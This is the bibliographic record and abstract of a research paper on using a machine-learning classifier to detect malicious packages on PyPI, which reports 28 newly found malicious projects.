S. A. Rakovsky, “Detecting malicious activity in open-source projects using machine learning methods”, Proceedings of ISP RAS, 2024, Volume 36, Issue 3,Pages <nobr>161

Detecting malicious activity in open-source projects using machine learning methods

S. A. Rakovsky

MIREA — Russian Technological University, Moscow

Abstract: The Python Package Index (PyPI) serves as the primary repository for projects for the Python programming language, and the package manager pip uses it by default. PyPI is a free and open-source platform: anyone can register a user on PyPI and publish their project, as well as examine the source code if necessary. The platform does not vet projects published by users, allowing for the possibility to report a malicious project via e-mail. Nonetheless, every less than month analysts repeatedly discover new malicious packages on PyPI. Organizations working in the field of open repository security vigilantly monitor emerging projects. Unfortunately, this is not enough: some malicious projects are detected and removed only several months after publication. This paper proposes an automatic feature selection algorithm based on bigrams and code properties, and trains an ET classifier capable of reliably identifying certain types of malicious logic in code. Malicious code repositories MalRegistry and DataDog were used as the training sample. After training, the model was tested on the three latest releases of all existing projects on PyPI, and it succeeded in detecting 28 previously undiscovered malicious projects, the oldest of which had been around for almost one and a half years. The approach used in this work also allows for real-time scanning of published projects, which can be utilized for prompt detection of malicious activity. In this work, the additional focus lays on methos that do not require an expert for feature selection and control, thereby reducing the burden on human resources.

Keywords: pypi, malware detection, open-source security, open-source

Language: English

DOI: 10.15514/ISPRAS-2024-36(3)-11